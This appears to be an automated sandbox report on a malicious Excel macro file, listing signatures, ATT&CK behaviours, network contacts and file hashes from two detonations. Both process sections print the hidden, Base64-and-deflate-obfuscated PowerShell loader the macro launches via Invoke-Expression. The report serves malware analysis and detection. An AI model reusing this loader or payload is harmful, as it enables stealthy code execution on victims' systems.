Malware Analysis Report

2025-06-16 00:47

Sample ID 241107-1ect3sygma
Target 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824
SHA256 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824

Threat Level: Known bad

The file 455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Suspicious Office macro

Blocklisted process makes network request

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 21:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 21:33

Reported

2024-11-07 21:34

Platform

win7-20240903-en

Max time kernel

15s

Max time network

20s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

Network

Country Destination Domain Proto
US 8.8.8.8:53 store.cloudxlarge.com udp
US 52.1.52.89:443 store.cloudxlarge.com tcp
US 8.8.8.8:53 crt.rootg2.amazontrust.com udp
FR 3.164.163.59:80 crt.rootg2.amazontrust.com tcp
US 8.8.8.8:53 dev-eupfdo1whf80ldiv.eu.auth0.com udp
US 104.19.152.19:443 dev-eupfdo1whf80ldiv.eu.auth0.com tcp
US 104.19.152.19:443 dev-eupfdo1whf80ldiv.eu.auth0.com tcp

Files

memory/2080-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2080-1-0x00000000728FD000-0x0000000072908000-memory.dmp

memory/2080-4-0x00000000060D0000-0x00000000061D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabE4C6.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarE4E8.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f8eb24dbc39f7728ae550d4a8a251483
SHA1 42ecbf852de98f29b60a84b9302bf732d43f7b09
SHA256 602e4cfc30d8355756c2f058041f793107959252da0954e5c0675190970b5285
SHA512 a993ea954d723534d2a4e8313f6e3d2f017c2f17faed6126c00184f817db2f92d15c197a77d8291d3e3d17c4f565f18f79a3209a7d35dfa0e7f606510d406f74

memory/2080-123-0x00000000728FD000-0x0000000072908000-memory.dmp

memory/2080-124-0x00000000060D0000-0x00000000061D0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 21:33

Reported

2024-11-07 21:34

Platform

win10v2004-20241007-en

Max time kernel

46s

Max time network

39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\455b17b0f0421a7a7ae4dede39079526303e9cb16c5db68f98ebf0de9cc1d824.xls"

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 store.cloudxlarge.com udp
US 52.1.52.89:443 store.cloudxlarge.com tcp
US 8.8.8.8:53 dev-eupfdo1whf80ldiv.eu.auth0.com udp
US 104.19.153.19:443 dev-eupfdo1whf80ldiv.eu.auth0.com tcp
US 8.8.8.8:53 89.52.1.52.in-addr.arpa udp
US 8.8.8.8:53 19.153.19.104.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 104.19.153.19:443 dev-eupfdo1whf80ldiv.eu.auth0.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp

Files

memory/1892-0-0x00007FFCA82F0000-0x00007FFCA8300000-memory.dmp

memory/1892-2-0x00007FFCA82F0000-0x00007FFCA8300000-memory.dmp

memory/1892-4-0x00007FFCA82F0000-0x00007FFCA8300000-memory.dmp

memory/1892-3-0x00007FFCE830D000-0x00007FFCE830E000-memory.dmp

memory/1892-1-0x00007FFCA82F0000-0x00007FFCA8300000-memory.dmp

memory/1892-5-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-6-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-7-0x00007FFCA82F0000-0x00007FFCA8300000-memory.dmp

memory/1892-10-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-9-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-8-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-11-0x00007FFCA6070000-0x00007FFCA6080000-memory.dmp

memory/1892-12-0x00007FFCA6070000-0x00007FFCA6080000-memory.dmp

memory/1892-22-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-23-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-26-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/2428-33-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/2428-35-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/2428-34-0x0000000003160000-0x0000000003196000-memory.dmp

memory/2428-36-0x00000000059B0000-0x0000000005FD8000-memory.dmp

memory/2428-37-0x0000000005860000-0x0000000005882000-memory.dmp

memory/2428-38-0x0000000005900000-0x0000000005966000-memory.dmp

memory/2428-39-0x0000000006050000-0x00000000060B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zol0pqoe.ls3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2428-49-0x0000000006100000-0x0000000006454000-memory.dmp

memory/2428-50-0x0000000006750000-0x000000000676E000-memory.dmp

memory/2428-51-0x0000000006780000-0x00000000067CC000-memory.dmp

memory/2428-52-0x0000000007E80000-0x00000000084FA000-memory.dmp

memory/2428-53-0x0000000006C50000-0x0000000006C6A000-memory.dmp

memory/1892-54-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/1892-55-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

memory/2428-56-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 4491d24d4900f03ef4ec8bd1006c98e6
SHA1 bc04962ed8555a3faf9894ea0cd9b8d91deb43ab
SHA256 d7d615933115e8dfceb5e997bbbb839ab1930db2b11776e98c9207dadda28331
SHA512 a3eb141cdbdd9067c59abf1092052a0ee3e29e03e810a643db85bb7326c841add542143f2123faf90d63a004b9722c90d408e07a991a5fd6ce9b47e6b24056a1

memory/2428-68-0x00007FFCE8270000-0x00007FFCE8465000-memory.dmp